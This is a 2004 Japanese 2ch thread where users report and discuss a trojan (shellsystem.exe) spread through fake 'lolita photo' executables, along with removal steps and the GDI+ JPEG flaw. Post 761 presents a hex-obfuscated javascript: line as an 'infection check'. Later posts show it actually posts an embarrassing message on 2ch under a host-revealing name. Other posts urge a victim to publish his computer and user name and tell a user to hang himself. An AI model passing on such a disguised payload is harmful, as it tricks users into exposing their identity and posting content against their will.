【警報】Winnyを狙ったワーム・ウイルス情報 Part26

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 07/06 07:03 / Filesize : 237 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG]: Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc

■流行感染パターン
・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等）
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
tmp4.2ch.net/test/read.cgi/download/1093270545/l50

ﾃﾝﾌﾟﾚまとめ　www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
736 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:09:13 ID:IFT2b9V5]: >>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
737 名前：[名無し]さん(bin+cue).rar [04/09/23 06:10:23 ID:0ylh05j4]: で、エロの魔力で許可するをクリック！
738 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:18:26 ID:0jfdhz8j]: 簡易プロテクト？

C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe

とりあえず実験用の９８ＳＥ環境ではうまくいった。
メインマシンで実験する度胸はないので、ＸＰなどでは不明。
739 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:25:02 ID:J6w/KxT0]: これ犯人たどれるだろ。ネットカフェとかかな？
740 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:26:03 ID:IFT2b9V5]: >>739
踏み台はさまってたら無理
741 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:29:08 ID:J6w/KxT0]: >>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの？
742 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:12 ID:IFT2b9V5]: >>741
ドコのプロバイダに問い合わせるの？
743 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:29 ID:JsiucGEH]: 海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
744 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:35:42 ID:J6w/KxT0]: >>742
踏み台のだよ。
745 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:38:02 ID:IFT2b9V5]: >>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
746 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:16 ID:xduUn+v/]: >>739
追求のキーになるのが >>688で報告した
> Software\Meropa ？？なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
747 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:33 ID:J6w/KxT0]: >>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよｗ
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
748 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:13 ID:xduUn+v/]: >>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
749 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:40 ID:J6w/KxT0]: 殺されるは言い過ぎかｗ　でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
750 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:45:30 ID:zW53Q5jb]: ネカフェで時限式アップロードするように仕込んだとか。
751 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:46:34 ID:99Ier2R9]: 頑張れ。
752 名前：[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6]: こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね

v.isp.2ch.net/up/fa86350a6026.jpg

ウイルスに気づかずに必死に抜いている人1名ｗ
753 名前：469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq]: これって本人達が寝てる間は安全なんだね。
754 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq]: 数字消すの忘れた・・・＿|￣|○
755 名前：[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6]: どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5]: >>752
これは狙ってやってる気がしないではないな(笑)
757 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u]: 俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX]: 新種ウイルスと聞いてきました
759 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe]: 面白い事考える奴もいるもんだな
760 名前：[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV]: Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺ｷﾝﾀﾏ
761 名前：[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV]: 便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのｶﾞｲﾄﾞﾗｲﾝ2
that3.2ch.net/test/read.cgi/gline/1076853643/595-586

感染確認するには
2ch専用ブラウザを使用している人は、ＩＥなどの一般的なブラウザでこのスレを開いておく。
１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、改行を外して１行にする。
３、１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
４、 Enterを押す（もしくは「移動」をクリックする）。
エラーが出れば感染してます
762 名前：[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV]: >>761
参照間違えた・・
that3.2ch.net/test/read.cgi/gline/1076853643/595-596
763 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3]: 　
764 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y]: 俺はﾍﾟｹﾋﾟｰがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とﾒｰﾙｽﾄｰﾑをふんだ苦い経験持ちだが。
765 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW]: >>761
ﾜﾛﾀ
ロリ画像ですか
766 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS]: 【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】？？
【ちゃんとUpdateしてるか】？？
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのﾊﾞｰｼﾞｮﾝ】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】無し
【テンプレを読んだか】はい。
【テンプレにある対策を実行したか】実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】うｐされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767 名前：[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV]: >>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768 名前：[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix]: キンタマ作った香具師、逮捕されたのか
769 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS]: >>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、２回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq]: >>769
もう遅いｗ
とりあえず↓に来い。
削除の方法が分かるかもしれない。

アップローダーってずるい
idol.bbspink.com/test/read.cgi/ascii2d/1095880065/
771 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc]: >>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772 名前：[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV]: >>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq]: >>766
ご愁傷様
774 名前：[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4]: >>685
を見て確認してみ
775 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL]: >>762
596 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか？

597 名前：水先案名無い人[] 投稿日：04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。

598 名前：p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日：04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください

599 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz

600 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ

601 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。

602 名前：zaq3d2e96f7.zaq.ne.jp[] 投稿日：04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください

603 名前：濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日：04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ

604 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんｗ
やらんでよかったｗ
776 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV]: ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7]: 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS]: >>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH]: >拡張子表示は鬱陶しい

ﾊｧ?
780 名前：[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v]: 明かされてる画像みても無害？
781 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/]: いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。

作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。

一番のセキュリティホールは、ユーザーの意識だもんよ。
782 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR]: ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo]: 歴史は繰り返す。
784 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26]: そして人は学ばない
785 名前：[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI]: mp3の名前などを勝手にいじるウィルスってあります？
786 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:08:25 ID:LvJ+JBBu]: >>729
アイコンでわかるだろ？
787 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:12:17 ID:kDRZUavo]: >>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
788 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:16:24 ID:qJ0+JsGI]: で、誰かウイルス駆除ソフト屋さんに報告したの?
789 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:23:29 ID:iqYKdWhe]: >>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
790 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:29:04 ID:ky5A4Ls4]: >>789
ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp

こんなのがあるから一概には大丈夫とは言えないかもしれない
791 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:30:06 ID:0lvmtZMl]: >>789
っていう、おまえも相当やばいのだが
792 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:32:33 ID:cDvdfQLH]: >>789
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
793 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:35:22 ID:iqYKdWhe]: >>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
794 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:36:31 ID:cDvdfQLH]: >>793
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
795 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:15 ID:iqYKdWhe]: んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
796 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:27 ID:xduUn+v/]: 今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
797 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:41:34 ID:xduUn+v/]: つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
798 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:42:55 ID:EMRLV6EZ]: jpgで感染！？(ﾟдﾟ)すんのかよ！？
799 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:45:36 ID:LvJ+JBBu]: >>798
するよ～、jpg見るどころか、うｐロダ逝ったら即感染ですよ
怖いよ～ウィルスわ
800 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:52:21 ID:ky5A4Ls4]: まあ、SP2な俺には関係ないが
801 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:54:42 ID:iqYKdWhe]: >>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ？」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。
802 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:55:44 ID:jZRbqOye]: >>801
SP2を入れると不具合出そうで恐いよ～。
803 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:56:54 ID:ky5A4Ls4]: ttp://www.openwall.com/advisories/OW-002-netscape-jpeg/crash/
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにﾉｰﾄｿが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない
804 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:07:06 ID:EMRLV6EZ]: ２ｃｈブラウザのjpg垣間見機能でもだめか？
805 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:11 ID:jZxILG0u]: >766
LANケーブル抜いてネット切断、それで首吊れ
806 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:12 ID:zW53Q5jb]: 苺きんたま対策(仮)
www.geocities.jp/ichigo_kintama/

まとめサイトできたようだ
807 名前：[名無し]さん(bin+cue).rar [04/09/23 11:14:52 ID:2DsdDYOp]: >>469
ダウンロードできないんだけど、もう削除されたかな？
808 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:22:10 ID:PFKtStB6]: >>766
再起動してタスクマネージャー開いてプロセス見ろ。
それでshellsystem.exeを終了させろ。
これで動作は速くなる。
あとはレジストリでshellsystem.exeを削除すれば終了
809 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:24:03 ID:sH8yfJe2]: マルチプロセスだからタスクマネージャからは消せんぞ。
810 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:27:07 ID:PFKtStB6]: >>809
遊びで感染したんだが、再起動させたら俺は消せた。
なんでかはわからん
811 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:31:26 ID:cDvdfQLH]: 112 名前：eatkyo287016.adsl.ppp.infoweb.ne.jp＠Share使用中 ◆i.ESDXOLYY [] 投稿日：04/09/23 10:43:42 ID:La2FDeZx
{Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません)
～何も無いので環境変数晒し～

コンピュータ名: VIP
ユーザー名: takehiro

ﾜﾛﾀ
812 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:35:25 ID:2aG10cCS]: 俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか
ほりえもんとか毎日新聞で凶悪ぺド画像とか
813 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:43:24 ID:IQ9BvSXd]: しまった、祭りに乗り遅れた。
nyか洒落にあがってないかな(w
814 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:45:03 ID:tyH5EMtg]: >>813
京都府警にしてよ
815 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:19 ID:k8gkpGNZ]: このトロイの動作解説ページってまだないかな。

なんかおもしろそうだから感染させてみたいんだが。
816 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:30 ID:IqZ2HObi]: × しまった、祭りに乗り遅れた。

○ うお
　　完璧乗り遅れた
817 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:49:27 ID:k8gkpGNZ]: Winnyを立ち上げてない限り，被害はないんだろ？
何で祭りになってんだ？？
818 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:51:17 ID:cDvdfQLH]: 初級ネットワーク板ローカルルール申請
qb5.2ch.net/test/read.cgi/operate/1095695740/

Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな
819 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:56:30 ID:J5HdIDac]: 「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな
820 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:57:37 ID:pr4shzQV]: >>817
ｎｙは関係ない
821 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:59:51 ID:lSmv7nYn]: ファイル名変えて、あちこちに貼られてら。
822 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:20 ID:xCg9vDsC]: なんか、もれのデスクトップ画像が２ｃｈアプロと言う
どこかにアップされているらしいです。

それを見て自分を笑いたいのですが、どこにあるか
分かりますでしょうか。
823 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:37 ID:RdY8SqQw]: 俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。
しかもホストOSはOS Xだし
824 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:02:37 ID:cDvdfQLH]: Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ
PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip
1,219,360
13deb3c8b87346cd5b1a9de9029c855fc7b6128e

これか
825 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:08:21 ID:NktT5qfN]: 7-zip反則だな。これなら1/3近くにもなるわけだ。

7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10

Listing archive: F:\DESKTOP\キンタ~1.7Z

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------
2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe
2004-09-22 15:57:10 ....A 677376 0　　 (写真集) (ロリータ) 相田香奈子.exe
2004-09-22 15:57:10 ....A 677376 0　　コピー～ (写真集) (ロリータ) 河瀬菜美.exe
------------------- ----- ------------ ------------ ------------
2032128 319288 3 files

キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z
キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza
キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab
キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1
キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip
826 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:09:25 ID:cDvdfQLH]: ナニソレ
827 名前：[名無し]さん(bin+cue).rar [04/09/23 13:14:14 ID:EKR+VzAM]: これってjpgのリンク踏んだだけで感染するんですか
828 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:17:14 ID:cDvdfQLH]: ｎo
829 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:29:10 ID:JTze3qp6]: SSの機能を無効にする方法って無いの？
830 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:30:03 ID:H4H6HXnY]: 新種のキンタマが開発されたと聞いて飛んできました

ノートン先生がスルー・・・？　ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
831 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:32:02 ID:joit0XmS]: ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は
感染してるんでしょうか
プロセスなどにはshellsystem.exeはありませんでした
832 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:34:53 ID:Y12C9VC7]: >>831
どうせ検索の履歴だろ
833 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:35:15 ID:H4H6HXnY]: >>831
削除するに越した事は無いんじゃないですか？
